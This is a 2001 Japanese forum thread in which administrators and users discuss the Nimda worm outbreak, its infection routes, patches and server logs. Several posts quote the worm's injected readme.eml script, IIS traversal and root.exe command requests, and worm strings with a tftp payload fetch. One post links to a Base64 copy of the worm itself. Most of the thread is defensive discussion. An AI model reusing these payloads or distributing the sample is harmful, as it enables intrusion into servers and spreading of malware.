まぎらわしいからMacは感染しないなんていわないで、MacやLinuxからも感染するって言えよ!検査対象から外されてるよ!

786 :名無しさん@お腹いっぱい。:01/09/20 09:49
784

機種・OS問わず共有エリアをチエックしないと、そこから復活する

787 : :01/09/20 09:53
ルータのログにアクセスいっぱい
TCP:80を叩かれまくり。

788 :名無しさん@お腹いっぱい。:01/09/20 09:56
表ざたになってない(というか、信用問題に発展するので表に報告しない)
社内LANの被害は尋常ではないと思われ(;´Д`)

789 : :01/09/20 09:58
>>785
それはべつにこれに限ったことじゃないだろ。アホか?

790 :名無しさん@お腹いっぱい。:01/09/20 09:59
PE_NIMDA.Bらしきものが見つかったってホント?

791 :名無しさん@お腹いっぱい。:01/09/20 10:00
2001/09/18 【IT Proアンケート】ウイルス対策についての皆さんのコメント
http://itpro.nikkeibp.co.jp/free/ITPro/ITPROFORUM/20010917/2/

タイミングがアレゲすぎ(;´Д`)

792 :名無しさん@お腹いっぱい。:01/09/20 10:00
>>784
いや、もっと感染してるよ。
おおよそ思い付く限りのIISで稼動してる鯖へ逝ってみれば?
結構の鯖がサービスを停止してると思われます。
うちの鯖もやられたので切り離してる。
中に入っている顧客の事より、被害を広げたりする方が損害がデカイから。

793 :名無しさん@お腹いっぱい。:01/09/20 10:02
ところで、Nimda に名前の由来知っている人いない?

794 :名無しさん@お腹いっぱい。:01/09/20 10:03
>>789

>>641こういうバカのこと言ってんの。

795 :名無しさん@お腹いっぱい。:01/09/20 10:04
Win2K再インストール後にhisecweb.infテンプレート適用するのを忘れていたのに今気が付いたよ・・・鬱

796 :名無しさん@お腹いっぱい。:01/09/20 10:05
ワームのソース公開キボンヌ

797 :名無しさん@お腹いっぱい。:01/09/20 10:05
ADMIN 2(to) (the)3(rd) War

798 :797:01/09/20 10:06
>>793
逆読みしてねん

799 :名無しさん@お腹いっぱい。:01/09/20 10:07
>>791

ここに自身満々で対策してますって書いてるヒト、ほとんどは今回ので感染したな・・。

800 :名無しさん@お腹いっぱい。:01/09/20 10:08
正直、ネ助入れたい。

801 :名無しさん@お腹いっぱい。:01/09/20 10:08
>>796

自分でもってけ

http://search.fresheye.com/?kw=readme%2eeml&term=weekly

802 :名無しさん@お腹いっぱい。:01/09/20 10:08
いれりゃいいじゃん

803 :名無しさん@お腹いっぱい。:01/09/20 10:15
>>794
動くの?

804 : :01/09/20 10:19
>>797
W32は只の識別用の区分ね。
WIN32で走るプログラムの意。
誰だよ。第三次世界大戦なんて言い出したの。
マスコミこんな報道してる手間に、関連バグやパッチの情報出せって。

805 :名無しさん@お腹いっぱい。:01/09/20 10:21
>>803

Java Script や HTML はどうよ。

806 :名無しさん@お腹いっぱい。:01/09/20 10:22
>>805

VBAもな(w

807 :名無しさん@お腹いっぱい。:01/09/20 10:23
リスクはいらないし
逆汗環境もdump環境もないにょ

808 :名無しさん@お腹いっぱい。:01/09/20 10:24
ダンプ取るとNIMADAっていう文字列が入っているのかな?

809 :名無しさん@お腹いっぱい。:01/09/20 10:24
回線細いからめんどい。<N助ダウソ

810 :名無しさん@お腹いっぱい。:01/09/20 10:25
トレンドでは危険度がVA1に・・
「PE_NIMDA.A」VAC1国内大規模感染警報

俺の記憶じゃいままで2が最高だったと思うが・・・

811 :名無しさん@お腹いっぱい。:01/09/20 10:26
>>805
それWindows用のプログラムじゃねーじゃん。
それにreadme.exeがマックに出来たところで
ゴミが増える以外に被害あるの?

812 :名無しさん@お腹いっぱい。:01/09/20 10:28
>>811Mac自身に被害はないが 被害を広げる

813 :名無しさん@お腹いっぱい。:01/09/20 10:28
Inetpub書き換え放題マンセー

814 :名無しさん@お腹いっぱい。:01/09/20 10:30
>>812
どうやって広げるの?

815 :名無しさん@お腹いっぱい。:01/09/20 10:35
MacでWebサイト立ててて、そこWinとファイル共有してたら、Macからでも感染する

816 :名無しさん@お腹いっぱい。:01/09/20 10:39
>>789
>>>785
> それはべつにこれに限ったことじゃないだろ。アホか?

今回はMacも知らずにもらうんだよ。しかもMacから他へ広めることもある。

817 :名無しさん@お腹いっぱい。:01/09/20 10:42
マッカーやリナクサーからしてみればそんなの知ったことかって感じだよなぁ。

818 :名無しさん@お腹いっぱい。:01/09/20 10:43
>>789

マカーは今回のことは対岸の火事と思ってるからな。

そこまで言えるなら、マカーにも啓蒙してやってくれ。

819 :名無しさん@お腹いっぱい。:01/09/20 10:45
>>817

やつらが日頃嗤ってるWindowsユーザー以下の態度ぢゃん!( ̄△ ̄;

820 :名無しさん@お腹いっぱい。:01/09/20 10:48
Macは感染しない。経路にはなる。
経路になる可能性はどのOSにもある。

821 :名無しさん@お腹いっぱい。:01/09/20 10:48
ウイルスのEXEを自分自身で実行できないだけで受ける被害はMacだってWindowsとかわんないぢゃん

822 :名無し募集中。。。 :01/09/20 10:50
http://61.208.221.9/

823 :名無しさん@お腹いっぱい。:01/09/20 10:50
>>820

分かったようなこと書いてるけど、Nimda以前はそんなことマカーは心配してなかったんじゃないの?

824 :名無したんに接続中・・・:01/09/20 10:51
>>822
氏ね
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

825 :名無しさん@お腹いっぱい。:01/09/20 10:51
>>819
逆にMacウィルスが大蔓延したとしてWinユーザーはそのために動くか?
自分に影響がないなら大多数は動かないと思うけど。

>>821
誰かに送っちゃって信用問題とかそういう二次的被害は別にしたら
ウイルスなんて実行しなければ実害ほとんどないじゃん。

826 :名無しさん@お腹いっぱい。:01/09/20 10:55
>>808

参考までにアップ
http://members.jcom.home.ne.jp/hangedman/readme.txt

文字列のみ切り出したもの。30000ぐらいから読める
http://members.jcom.home.ne.jp/hangedman/readme_exe.txt

本体(exeでアップするわけにもいかないので自分でBase64デコードして)
http://members.jcom.home.ne.jp/hangedman/readme.eml.txt

827 :752=756=758=オレ:01/09/20 10:56
先ほどわかったんだが、Macでも感染するらしい。
サイト閲覧していてダウンロードを促すダイアログが出た。
このままダウンロードしたら感染だんろうなぁ・・・・・

更にWinにてIE5.5SP2でもダウンロードされてしまった。
TEMPフォルダに「W32 TROJ_NIMDA.A」というファイルが・・・・
気付いたんだが、ダウンロードされたファイル名は個々に違う様に思ふ

828 :名無しさん@お腹いっぱい。:01/09/20 10:57
メール鯖と思われる所からきた。

mail.cyberitcorporate.com - - [20/Sep/2001:09:09:04 +0900] "GET /scripts

829 :名無しさん@お腹いっぱい。:01/09/20 11:01
>>825

そういうことだな。

Windows全部スキャンしても、MacのウイルスチェッカにNimdaはひっかからないから、Macは温床になりうるんだ。

Macはウイルスの温床とか言いがかりつけられてMac社内禁止令とかだされてもマカーの自業自得だな。

830 :名無しさん@お腹いっぱい。:01/09/20 11:03
>>827
ダイアログ出た?
うちは別ウインドウにreadme.emlの内容がずら〜っと表示されただけだったよ
どこかのスレ(ニュー速かな?)に書いてあったトルシエ応援ページのところでね

831 :名無しさん@お腹いっぱい。:01/09/20 11:06
質問:
 NT4ServerとNT4WSがあって、IE5 (5.00.2314.1003) があるんですが
 MSのサイトによると
>本ワームへの対策としては、各製品に対して
>Service Pack 2 のインストールを行う
>Internet Explorer 5.01 SP2 (Windows 2000 SP2 に含まれています)

ってあるんですが、Windows2000SP2のCDは手元にあるんですが、
これをNT4のマシンに突っ込んでアップデートしろ
ってことですかい?

832 :(´Д`;):01/09/20 11:07
Macだ、Winだ言ってるのは、個人ユーザーなら別に勝手にしろ
だけど、、、nimdaって、多分に企業内のLAN環境意識してると
思うよ。書いた奴。
自分の端末だけ良ければと言う考え方は、こういうウイルス出
たとき、特にビジネスユーザーは非常に危険。
仕事で仕方なくキーボード叩いてる奴もいる訳だし。誰が地雷
踏むかなんて予測できない。
・・・商用サイトのINDEX書き換えの為に閉鎖って、どのぐらい
の損失生むのかな。。。感染ユーザーからのクレーム処理も含め
て。

833 :名無しさん@お腹いっぱい。:01/09/20 11:09
>>827
ダウンロード促すとこまではMacでも一緒だけど、DLしても
readme.emlの実態であるreadme.exeは実行できないから
感染はしないよ。

834 :名無しさん@お腹いっぱい。:01/09/20 11:10
>>831 ここをよく読むように。むう。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078

835 :名無しさん@お腹いっぱい。:01/09/20 11:11
>>83
WIN2K(SP2)に入ってるだけってこと、SP1の人はアップデート
しとほうがいいんじゃないって解釈したけど。

俺はコードレットでてから(感染)、Meに変えたよ(バカ)

836 :名無しさん@お腹いっぱい。:01/09/20 11:12
>>831 IEとIISの違いがわかる人だよね?(^_^;

837 :835:01/09/20 11:13
83→831です

838 :名無しさん@お腹いっぱい。:01/09/20 11:15
>>833
バーチャルPC入ってたらまずいのではないっすか?
昨日あわてて削除した

839 :名無しさん@お腹いっぱい。:01/09/20 11:18
>>838
バーチャルPC上で実行したIEから感染、は当然あり得るけど
それをもってMacが感染したと言うのはどうかと思う。
それと、バーチャルPCが入ってても実行してなければ
Mac上で何をしようと感染はしないよ。

840 : :01/09/20 11:20
http://61.208.221.9/

841 :名無しさん@お腹いっぱい。:01/09/20 11:22
>>831を翻訳。「IEを5.01SPにアップデートしようとしたんですが、上記のように
Win2KSP2に含まれていると記載されていました。私、Win2KSP2の
アップデートCD持ってるんですが、このCDを使ってIEをアップデートできますか?」
答え ダメです。

842 : :01/09/20 11:23
W32Nimdaの「W32」逆読みして第三次世界大戦なんてコメントつけて
報道したマスコミ何処だよ。。。
WIN32のアプリなんだって!この辺ちゃんと報道できないマスコミは
糞だ。。。
ソースに、dosモードじゃ動かねーぞって書いてあるだろが。

843 :名無しさん@お腹いっぱい。:01/09/20 11:24
>>842 >>33にある。

844 :831:01/09/20 11:25
>>834
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
ここを読んだんですが。Nimdaの事はおいといて、
Win2000SP2を使って、NT4上のIE5.00をアップデートできるのか?
っていう単純な疑問です。

845 :名無しさん@お腹いっぱい。:01/09/20 11:27
IE5.00なら感染しないの?

846 :831:01/09/20 11:28
>>841
はい、そう言いたかったのです。
結果、ダメなんですね。正確に解釈していただいて有難うございます。

# IE5.5SP2ってCDROMかなんかで雑誌についてますでしょか?
9600bpsの身なので、オンラインじゃちょっと…。

847 :844:01/09/20 11:29
>>844 すまん。読み違えてたよ。出来ないと思うけど。やってみたこと
ないからわからんが。CDの中身みてIEのセットアップファイル見つけて
起動してみて、いけそうだったらやってみれば?
あまりお勧めできないけど。自己責任でどうぞ。

848 :名無しさん@お腹いっぱい。:01/09/20 11:31
>>847 すまん。名前間違えた。834でございます。鬱。

849 :名無しさん@お腹いっぱい。:01/09/20 11:31
/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&dir+\

850 :マルチポストすまん:01/09/20 11:37
これってCodeBlue? Nimda?↓
[18/Sep/2001:22:58:22 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290

もうどっちだかわからん。

851 :842:01/09/20 11:38
>843
・・・長官って、、、モララーか?
記者会見のコメントそのまま速報で載せたのか。。。毎日。
ap、ロイター辺り見てみよっと。

852 :名無しさん@お腹いっぱい。:01/09/20 11:39
>>847
どうも。
ちなみにCDの中身にIEのセットアップファイルは
ありませんでした。Win2000SP2へのアップデートという事で、
全部いっしょくたになっているみたいです。

853 :Nida:01/09/20 11:40
そこに行ってみればわかるじゃん

854 :Nida:01/09/20 11:41
ごめん
>850 に

855 :名無しさん@お腹いっぱい。:01/09/20 11:42
とりあえず、http://www.trendmicro.co.jp/nimda/tool.asp を実行して
*.eml、system.ini、*.htmなんかは削除、修正できたみたいだけど、
使用頻度の高いexeに感染するとかいうのもこれで直ったのかね。
ひょっとして、感染した実行ファイルはバッサリ削除されたのか?

ちなみに、ウチではhtmファイルの追記は起こってなかった。

856 :名無しさん@お腹いっぱい。:01/09/20 11:43
>>850
↓CERTで公開。nimdaの足あと。
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c..
/winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

857 :名無しさん@お腹いっぱい。:01/09/20 11:46
>>856
ありがとう!
下のURLのCodeBlueの説明には
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

=================================
Code Blue は HTTP GET 要求を送信し、「Web サーバーフォルダへの侵入」
の脆弱点を悪用しようと試みます。こうした要求は、次のような形式です。

GET /.. [Encoded characters] ../winnt/system32/cmd.exe?/c+dir
==================================

とあるので、、、ログでは区別できないってことですかね??

858 :名無しさん@お腹いっぱい。:01/09/20 11:49
Codered
ホワイトハウスを狙った中の田舎学生の仕業。

CoderedU
Coderedにブチ切れたアメ公が中狙いで報復。殆どがチョンで爆発。jappppも延焼。

nimda
CoderedUにブチ切れた中の反撃。

859 :名無しさん@お腹いっぱい。:01/09/20 11:51
http://www.trendmicro.co.jp/nimda/のページ、
内部サーバエラーです、と出ます。
これってダウソしてるってことですか?

860 :名無しさん@お腹いっぱい。:01/09/20 11:51
>>858
セキュリティ板で半角カナつかうな

861 :名無しさん@お腹いっぱい。:01/09/20 11:53
>>857
CodeBlueは最初にHEADが来るらしいよ。
いきなりGETがくるのはNimdaかと。

862 :名無しさん@お腹いっぱい。:01/09/20 11:54
マンセー

863 :がいしゅつくん:01/09/20 11:54
C:\Windows\Program files\nimda\の中にある
setup.exeは実行しても害は無いでしょうか?

864 :名無しさん@お腹いっぱい。:01/09/20 11:55
>>861
おお、そうでしたか。ありがとう!  

865 :名無しさん@お腹いっぱい。:01/09/20 11:57
nimdaをムは小さく発音で「二(ム)ダー」と呼ぶのはダメですか?(w

866 :856:01/09/20 12:01
>>857
突いてくる穴は同じなんだよね。ブルーと。
レッドのバックドア利用するのも同じだし。
>>853
が言うようにそこ行っててみれば解るだろうね。
index.hml直下にreadme.eml有ればnimdaと。。
・・どっかでブルーのフットプリント見たような
気がする。。何か少し違ったような。探してみる。
でも、アクセス時点で弾いてれば、それ以後の活
動の足跡は残らないだろうね。

867 :名無しさん:01/09/20 12:02
http://www.koto.ed.jp/motokaga-sho/

小学校のほっぽらかしのページとか、結構ひっかかりまくります。

Cuam使用の人は、取り敢えず*readme.emlをCloseURLに入れる
といいかも。

868 :名無しさん@お腹いっぱい。:01/09/20 12:09
interqのウェブページ、軒並み引っかかっている模様。注意。

869 :名無しさん@お腹いっぱい。:01/09/20 12:23
今回、まだ情報が安定してないけど、
そろそろPart2のスレ準備せんと。。。

870 :  :01/09/20 12:28
これ見る?
ttp://www.stride.co.jp/~z32/cgi-bin/worm.cgi

871 :名無しさん@お腹いっぱい。:01/09/20 12:41
トレンドマイクロ NIMDA対策ページ。
http://www.trendmicro.co.jp/nimda/index.asp

872 :名無しさん@お腹いっぱい。:01/09/20 13:00
ログ見てたら
GET /scripts/root.exe?/c+dir
で200を返してるところがあったんだけどこれってマズイ?
他は404か500なんだけど。

873 :名無しさん:01/09/20 13:02
当たり前なんだけど、404なページにも当然ながら仕込まれていますね。

http://www.koto.ed.jp/aaa

こまったもんだ…

874 :名無しさん@お腹いっぱい。:01/09/20 13:04
>>872
http://www.nda.co.jp/memo/RFC2068.html
エラーコード表

875 :名無しさん@お腹いっぱい。:01/09/20 13:09
平素より MSN をご利用いただき、まことにありがとうございます。

9 月 18 日夜 11 時より、MSN(http://www.msn.co.jp/)において、新しく多彩なウイルス
体験のできるソフトウェア「Nimda」の配付を開始いたしました。

また、これにともない、昨晩同時刻以降 MSN のサーバーをご覧になったお客様には、自動的に
「Nimda」がインストールされるようになっています。

自動インストールには以下のバージョンのブラウザが必要です。
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1

これ以外のブラウザを利用されている方は、MSN(http://www.msn.co.jp/)にアクセスすると
ファイルをダウンロードするように求められるのでダウンロードして実行してください。

「Nimda」には以下の機能があります
1. 電子メールによって「Nimda」を配付
2. ネットワーク不の他のコンピューターに「Nimda」をインストール
3. インターネット不のサーバーにアクセスして、可能であれば「Nimda」をインストール

MSN(http://www.msn.co.jp/)は、月間ユニークユーザー数1600万人(2001年7月)を誇る
日本で有数のウイルスポータルサイトです。今後ともよろしくお願いします。

876 :  :01/09/20 13:12
>>875
わらえないよ。

877 :コピペでスマソ:01/09/20 13:17
952 名前:ニムダをハングルで書いてみました。
投稿日:01/09/19 10:17 ID:OO3wQbOI
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
□□□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□■■■■■■■■□□■□□□□
□■□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□■□□□□□■■■□■□□□□■□□□□□□□□□■□□□□
□■■■■■■□□□□■□□□□■□□□□□□□□□■■■■■
□□□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■■■■■■■■□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□

878 : :01/09/20 13:27
>>877
ちなみに、ハングル語では、何か意味あるの?>ニムダ

879 :名無しさん@お腹いっぱい。:01/09/20 13:58
バックドア完全に塞がずにSP2で対処したと思っているのも掃討多いみたいだな。
2Kアップデート版で知らずにIIS走らせているうすら馬鹿。
1台でサーバーとクライアントを共用している貧乏人。

そういうのに限ってM$に損害賠償請求とか騒いでる。

880 :名無しさん@お腹いっぱい。:01/09/20 14:08
>>879
しょうがないじゃん!びんぼーなんだもん

881 :名無しさん@お腹いっぱい。:01/09/20 14:27
ノートン入れて、昨日あたりだと警告バンバン出てたのに
今日はまったく警告なし。
おかしいな?と思って感染先のソースを見ると

<html><script language="JavaScript">new Object()
</script></html>

になってた(ノートンにされてた?)

ノートン入ってないパソで同じページ見ると、ちゃんと

<html>
<script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")
</script>

になってる。
やるな、ノートン。

882 :名無しさん@お腹いっぱい。:01/09/20 14:28
tide136.microsoft.com というマシンからアタックがくる。
なんで自社パッチをあてないんだろう。

883 :名無しさん:01/09/20 14:29
>>880
貧乏なヤツがサーバ立てるなこのクソヤロウ

884 :初心者:01/09/20 14:38
よくわかんないんだけど、「ネットワークの共有を外す」って
会社のLANとかを外すって事?
「ファイルの共有」の共有を外すだけじゃだめ?

885 :名無し@富士通:01/09/20 14:46
FMーTOWNS OSでも感染するんかな?

886 :名無しさん@お腹いっぱい。:01/09/20 14:49
>>222
ノートン君だと

/scripts /MSADC /c /d /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin
/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts
/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts
/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?
/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 Admin.dll c:\Admin.dll d:\Admin.dll e:\Admin.dll
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

ここまでやって初めて反応します。
これ、メモ帳に張って.txtで開こうとしても開けな〜い。

887 :名無しさん@お腹いっぱい。:01/09/20 14:57
トレンドマイクロのNimdaページ繋がらないよ〜((;。;)

888 :名無しさん@お腹いっぱい。:01/09/20 14:59
Windows95 だと大丈夫なんでしょうか?
IE2.xしか入ってないマシンとか。

889 :名無しさん@お腹いっぱい。:01/09/20 14:59
>>884
システム管理者の指示に従え。
居なければ専門家に金出して調べて貰え。
素人が社内のネットワークいじるからダメなんだって。

890 :884初心者:01/09/20 15:11
>889
今のとこシステム管理者が何の動きも見せないので。
他社に添付ファイル付メールを送る必要があったんで、
ひとまずオンラインスキャンして送ったんですけど。

今ならウィルスに感染してないみたいだし、共有ファイルは
部署内使用が主だから、外した方がいいなら外しても問題ないかな
とちょっと思ったの。スマソ

891 :名無しさん@お腹いっぱい。:01/09/20 15:12
なんか root.exe に来るやつも結構あるんですが、これはNimdaとは別種?

892 :名無しさん@お腹いっぱい。:01/09/20 15:16
>>833

ハア?(´Д`;)

893 :名無しさん@お腹いっぱい。:01/09/20 15:21
MacでWebサイト立ててて、そこWinとファイル共有してたら、Macからでも感染。

894 :名無しさん@お腹いっぱい。:01/09/20 15:21
Windows全部スキャンしても、MacのウイルスチェッカにNimdaはひっかからないから、Macは温床に

895 :TTT:01/09/20 15:22
IE6 フルでダウンロードするにはどうすればいいでしょうか?

896 :名無しさん@お腹いっぱい。:01/09/20 15:23
>>892

>>451

897 :名無しさん@お腹いっぱい。:01/09/20 15:26
メールが来たと思ったら
【小泉内閣メールマガジン 2001/09/20】難局にひるまず立ち向かおう!!
だった。

898 :名無しさん@お腹いっぱい。:01/09/20 15:26
14:30くらいにピタリとNimdaのリクエストが
来なくなった。それ以来CodeRedIIが3発来た
だけ。正直、気味悪い。

899 :あちゃー:01/09/20 15:29
IIS4.0でウイルス駆除した後に共有だけ勝手にされちゃうんだけど
これの直し方知ってる?ウイルス自体はすべてなくなったんだけど
共有だけ起動のたびにかってにされるのよ

900 :名無しさん@お腹いっぱい。:01/09/20 15:31
スマソ、勝手に増やされた削除できないユーザーってどう対処してる?

既出だったら、レス番おしえてm(_ _)m

901 :名無しさん@お腹いっぱい。 :01/09/20 15:31
>>898
かなり減ったね。でもうちはまだ来るよ。
かなり派手な動きするし、TVや一般の新聞やらでも
出てるので、さすがのヴォケ管理者でも気が付いた
のが多いかと思われ。

多分「とりあえずサーバ落としておくか」ってところが
多いんじゃないかな。

902 :名無しさん@お腹いっぱい。 :01/09/20 15:35
管理共有だヴォケ!
http://homepage2.nifty.com/winfaq/wxp/network.html#910
それといい加減IISもう使うな。

903 :902:01/09/20 15:35
>>902 は >>899 へのレスな

904 :名無しさん@お腹いっぱい。:01/09/20 15:37
トレンドマイクロが駆除修復ツールを出してましたよ。

http://www.trendmicro.co.jp/nimda/

905 :名無しさん@お腹いっぱい。:01/09/20 15:38
>>901
サーバー落としただけでなく、インターネット接続を切った会社が多い模様!(w

906 :898:01/09/20 15:39
今来た。ホッ (藁

でも14:30以降ずいぶん減った。
上流でなんか対策してるのかも。
「ニムダバスター」とか (藁

907 :名無しさん@お腹いっぱい。:01/09/20 15:39
案外、管理共有って知ってる人いないんだねぇ。
真っ先に切るけど。私。

908 :名無しさん@お腹いっぱい。:01/09/20 15:40
>>899
管理共有のことだったらそれが普通。
もちろん共有を外すことも可能。

909 :名無しさん@お腹いっぱい。:01/09/20 15:41
ガンガン来てます。ニムダさん。ログがめちゃくちゃです。ニムダさん。

910 :名無しさん@お腹いっぱい。:01/09/20 15:52
スポーツ新聞には、有明に上陸「グレート・ニタ」って出てた。
て、何?

911 :名無しさん@お腹いっぱい。:01/09/20 15:53
Nimdaログでかいな。
たまに来るCodeRedがかわいく思える(w

912 :名無しさん@お腹いっぱい。:01/09/20 16:01
俺のPCのnimdaアクセスログだよ
04時 119 |||||||||||
05時 239 |||||||||||||||||||||||
06時 175 |||||||||||||||||
07時 156 |||||||||||||||
08時 142 ||||||||||||||
09時 100 ||||||||||
10時 151 |||||||||||||||
11時 390 |||||||||||||||||||||||||||||||||||||||
12時 554 |||||||||||||||||||||||||||||||||||||||||||||||||||||||
13時 604 ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
14時 288 ||||||||||||||||||||||||||||
15時 260 ||||||||||||||||||||||||||

913 :ニムダ来ないよ:01/09/20 16:01
>>911
何のログもない、さみしいニダ。
Nimdaログ見せてほしいニダ。

914 :名無しさん@お腹いっぱい。:01/09/20 16:02
>>911
クラカーさんは、それが目的。ログ流し。

915 :名無しさん@お腹いっぱい。:01/09/20 16:08
>>912
それはJSTでのログかい?
CoderedIIの時は東南アジアの夜時間帯にピークがあった。
ニムダは北米狙い撃ち。
しかーし、テロではないテロだったらレジストリ引っ掻き回してクライアント起動不能にするだろうから。

916 :名無しさん@お腹いっぱい。:01/09/20 16:11
でっかい日の丸(´Д`;)
極東地域で被害が大きいね。

http://www.security.nl/misc/codered-stats/geodist.gif

917 :名無しさん@お腹いっぱい。:01/09/20 16:13
>>916
それは俺がこのスレで張った画像だ。
Coderedって書いてあるのが読めないのか?

918 :名無しさん@お腹いっぱい。:01/09/20 16:14
>>916
・・・・・・恐えぇ (;´Д`)

919 :名無しさん@お腹いっぱい。:01/09/20 16:18
>>916
ってか、、、オセアニア飲み込みそうな大きさなんですけど。。

920 :名無しさん@お腹いっぱい。:01/09/20 16:36
>>916
それCodeRedだし中心はソウルよ。

921 :名無しさん@お腹いっぱい。:01/09/20 16:38
>>915
かき回してしまったら、踏み台に使えないよ。
ある程度は繁殖してもらわないと困るし、
バックドアがないと目的のサイトに侵入できなくなるし。

922 :名無しさん@Emacs:01/09/20 16:39
% sed -n '/MSADC/s/.*\[\([^:]*\).*/\1/p' access.log | uniq -c
15 18/Sep/2001
235 19/Sep/2001
99 20/Sep/2001

…少ない?

923 :男爵:01/09/20 16:41
┏━━━━━━━━━━━━━━━┓
┃コードレッド男爵の放つ        .┃
┃強烈なトラフィック攻撃!         ┃
┗━━━━━━━━━━━━━━━┛

        |
    \/ ̄ ̄\/  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     |::; `皿´ |  < トトトトトトトトト、トラフィック!!
     ̄|:::;ヽ   | ̄  \__________
     \__\_/\
      /     \
     //| _   l |  _
    /| |/ ヽ  | |/っ、、ヽ
   / \/⌒゛゛/ \/   ```
  /   |   / ヽ。    ヽ。
 /    |  | |    。    。
 〜〜〜 | || |     。    。
       | / | |      ヽ   。   。
      // | |          ___
     //  | |        /´∀`;;::\ <グワァァァァ!!重い!!
    //   | |       /    /::::::::::|
    U   U       | ./|  /:::::|::::::|
.               | ||/::::::::|::::::|

924 :名無しさん@お腹いっぱい。:01/09/20 17:02
>>923
あの、、、全然強烈に見えないんですけど。。

925 :名無しさん@お腹いっぱい。:01/09/20 17:02
aa2000030222007.userreverse.dion.ne.jp
から nimda アクセスのログがいっぱい
あるんですが、、
pppサーバの名前とも思えないから、dion内部で使われているマシンか?

926 :名無しさん@お腹いっぱい。:01/09/20 17:15
>>925
HTTPリバースプロキシかな?

927 :名無しさん@お腹いっぱい。:01/09/20 17:28
こちらへどうぞ。

Nimda !! その弐
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617

928 :名無しさん@お腹いっぱい。:01/09/21 02:15
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/

929 :名無しさん@お腹いっぱい。:01/09/21 02:19
起きてたのかコピペ君ここの板は頭いい奴多くてかなわん。
俺と遊んでくれ。

930 :名無しさん@お腹いっぱい。。:01/09/21 02:21
おーいホントに寝たのか?

931 :名無しさん@お腹いっぱい。。:01/09/21 02:26
あながちマヌケでもないようね。

932 :名無しさん@お腹いっぱい。:01/09/21 04:21
>>923
激ワラタ。今まさにそれ食ってた。

933 :名無しさん@お腹いっぱい。:01/09/21 14:46
こっちのほうがおもろいよ。

ttp://210.124.76.100/

934 :名無しさん@お腹いっぱい。:01/09/21 14:55
UGTOP=ぶさいく典型的ヲタの集まり
Backsection=今風若者の集まり

935 :aaa:01/10/03 17:12
SP2 をあてたあとに感染する例は?
readme.exe を添付ファイルで受信してダブルクリックすると
感染するのでしょうか?

936 :名無しさん@お腹いっぱい。:01/10/03 17:32
SP2でも、添付ファイルreadme.exeを開いたり、
wavファイルに化けたヤツをWMPで再生しようとしたり、
感染したサイトで出たダウンロードダイアログを実行すると
感染します。IE、OEを使うときは、万が一の為にも
ウイルス検知ソフト定義ファイル最新版を起動しておこう。

937 :名無しさん@お腹いっぱい。:01/10/03 17:47
SP2を導入すれば、Webを見ただけでの感染は防げるけどね。
わざわざ実行すれば、そりゃ感染するよ。

938 :第三者中継可能:01/10/03 18:10
From : 752luq5f5n@msn.com
Reply-To : laurenevallejo1691@excite.com
To : j310knlqx5d@msn.com
